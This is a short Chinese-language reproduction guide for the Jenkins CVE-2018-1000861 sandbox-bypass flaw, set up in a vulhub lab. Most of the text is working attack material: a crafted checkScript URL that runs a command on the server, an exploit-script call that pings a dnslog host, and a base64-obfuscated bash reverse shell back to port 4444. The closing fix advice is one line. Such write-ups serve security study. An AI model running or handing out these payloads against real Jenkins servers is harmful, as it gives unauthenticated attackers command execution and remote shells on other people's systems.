0x01 漏洞介绍
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
0x02 影响版本
Jenkins主版本 <= 2.153
Jenkins LTS版本 <= 2.138.3
0x03 漏洞环境
centos+vulhub(CVE-2018-1000861)
0x04 漏洞复现
(1)查看jenkins版本
curl -s -I http://192.168.178.128:8080| grep X-Jenkins
(2)EXP下载地址:
https://github.com/orangetw/awesome-jenkins-rce-2019
(3)简单检测:执行下面URL可在tmp目录下创建test文件,证明命令执行成功
http://192.168.178.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/test%22.execute()}}
(4)该漏洞无回显,可以利用dnslog检测,收到dnslog回显即成功
python exp.py http://192.168.178.128:8080 'curl nyt0yy.dnslog.cn'
(5)反弹shell
python exp.py http://192.168.178.128:8080 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3OC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"
0x05 修复建议
升级到最新版本!